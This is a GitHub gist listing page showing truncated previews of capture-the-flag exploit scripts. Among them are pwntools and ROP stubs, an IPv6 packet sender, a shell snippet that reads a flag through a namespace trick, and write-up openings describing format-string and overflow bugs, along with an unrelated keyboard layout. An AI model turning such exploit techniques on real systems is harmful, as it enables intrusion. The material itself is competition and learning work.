stephenR
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import pwn | |
| import struct | |
| import binascii | |
| import base64 | |
| import time | |
| local = False | |
| #pwn.context(arch='x86_64', os='linux') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from socket import socket, AF_INET, SOCK_DGRAM, timeout | |
| import hashlib | |
| import time | |
| import struct | |
| from scapy.all import sendp, Ether, IPv6, UDP, Raw | |
| from bitarray import bitarray | |
| IP6 = PUT_TARGET_LINK_LOCAL_IPV6_HERE |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <sys/socket.h> | |
| #include <sys/un.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| static void err_quit(const char * const msg) { | |
| puts(msg); | |
| exit(-1); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| echo 'sleep 600' | /tmp/unshare & | |
| sleep 1; | |
| echo 'echo -e "r\n/proc/self/fd/3/vault/flag" | /home/adam/vault_explorer' | /tmp/opendir /proc/$!/root |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import pwn | |
| import struct | |
| def p(d): | |
| return struct.pack('<I', d) | |
| host = 'shuffle.polictf.it' | |
| port = 80 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import pwn as p | |
| import sys | |
| import random | |
| debug_enabled = len(sys.argv) > 1 | |
| def debug(s): | |
| if not debug_enabled: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From tsuro for Stratum Auhuur | |
| ==Stage 1== | |
| ICBM was a two stage challenge. The first stage was quite easy, there was a | |
| network service running, the sample_collector that read a filename from you in a | |
| loop (you have to confirm), a number of "samples" n, and then n integers that | |
| would be written onto the stack. The number n would be bounds checked that it | |
| can't be too big too overflow the buffer. There were two easy vulnerabilities | |
| in here, the filename would be passed as the first argument to printf and the | |
| buffer could by overflown by giving a negative value. We can use the format |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From tsuro for Stratum Auhuur. | |
| This challenge was a pwnable for 1000 points and it was a clone of the classic | |
| game sokoban, reimplemented with the help of ncurses. For everyone who doesn't | |
| know what sokoban is, it's an old 2d puzzle game. (this is the time where you | |
| should google for an image). You see your character from the top and have to | |
| push boxes around to some marked destinations. Anyway, the pwnable was exactly | |
| that game. If you solve level 6, you get the option to enter an infinite mode in | |
| which you get levels assigned randomly. | |
| ==Reversing== |
stephenR
/ gist:7158191
Created
October 25, 2013 17:08
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| default | |
| xkb_symbols "basic" { | |
| include "us(basic)" | |
| name[Group1]="Custom (EN-DE)"; | |
| key <AE11> {[minus, underscore, ssharp, ssharp]}; | |
| key <AD03> {[e, E, EuroSign, EuroSign]}; | |
| key <AD11> {[bracketleft, braceleft, udiaeresis, Udiaeresis]}; | |
| key <AC10> {[semicolon, colon, odiaeresis, Odiaeresis]}; | |
| key <AC11> {[apostrophe, quotedbl, adiaeresis, Adiaeresis]}; |
stephenR
/ wannabe.py
Created
October 25, 2013 15:08
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import os | |
| import struct | |
| def pack(addr): | |
| return struct.pack("<Q", addr) | |
| puts = 0x4009d0 | |
| gadget = 0x401583 |
NewerOlder